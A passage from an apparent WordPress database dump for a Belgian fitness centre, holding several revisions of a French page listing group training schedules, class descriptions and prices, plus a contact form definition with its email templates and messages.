class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n<br>\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:04:14', '2013-07-03 18:04:14', '', 11, 'http://www.crosstrainingcenter.be/?p=208', 0, 'revision', '', 0),
(209, 1, '2013-07-03 18:12:19', '2013-07-03 18:12:19', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:12:19', '2013-07-03 18:12:19', '', 11, 'http://www.crosstrainingcenter.be/?p=209', 0, 'revision', '', 0),
(210, 1, '2013-07-03 18:13:02', '2013-07-03 18:13:02', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:13:02', '2013-07-03 18:13:02', '', 11, 'http://www.crosstrainingcenter.be/?p=210', 0, 'revision', '', 0),
(257, 1, '2013-07-03 20:20:19', '2013-07-03 20:20:19', '<p>Votre nom (obligatoire)<br />\r\n    [text* your-name] </p>\r\n\r\n<p>Votre email (obligatoire)<br />\r\n    [email* your-email] </p>\r\n\r\n<p>Sujet<br />\r\n    [text your-subject] </p>\r\n\r\n<p>Votre message<br />\r\n    [textarea your-message] </p>\r\n\r\n[captchac captcha-712]\r\n<p>Veuillez recopier les caractères ci-dessus<br />\r\n[captchar captcha-712]</p>\r\n\r\n<p>[submit \"Send\"]</p>\n[your-subject]\n[your-name] <[your-email]>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\njuliepierrard@hotmail.com\n\n\n\n\n[your-subject]\n[your-name] <[your-email]>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\nstv@otvr.net\n\n\n\nYour message was sent successfully. Thanks.\nFailed to send your message. Please try later or contact the administrator by another method.\nValidation errors occurred. Please confirm the fields and submit it again.\nFailed to send your message. Please try later or contact the administrator by another method.\nPlease accept the terms to proceed.\nPlease fill the required field.\nYour entered code is incorrect.\nNumber format seems invalid.\nThis number is too small.\nThis number is too large.\nEmail address seems invalid.\nURL seems invalid.\nTelephone number seems invalid.\nFailed to upload file.\nThis file type is not allowed.\nThis file is too large.\nFailed to upload file. Error occurred.\nYour answer is not correct.\nDate format seems invalid.\nThis date is too early.\nThis date is too late.', 'Contact form 1', '', 'publish', 'open', 'open', '', 'contact-form-1', '', '', '2014-07-02 14:30:52', '2014-07-02 14:30:52', '', 0, 'http://www.crosstrainingcenter.be/?post_type=wpcf7_contact_form&#038;p=257', 0, 'wpcf7_contact_form', '', 0),
(211, 1, '2013-07-03 18:21:18', '2013-07-03 18:21:18', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<br><br><br>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<br><br><br>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<br><br><br>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:21:18', '2013-07-03 18:21:18', '', 11, 'http://www.crosstrainingcenter.be/?p=211', 0, 'revision', '', 0),
(213, 1, '2013-07-03 18:23:10', '2013-07-03 18:23:10', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:23:10', '2013-07-03 18:23:10', '', 11, 'http://www.crosstrainingcenter.be/?p=213', 0, 'revision', '', 0),
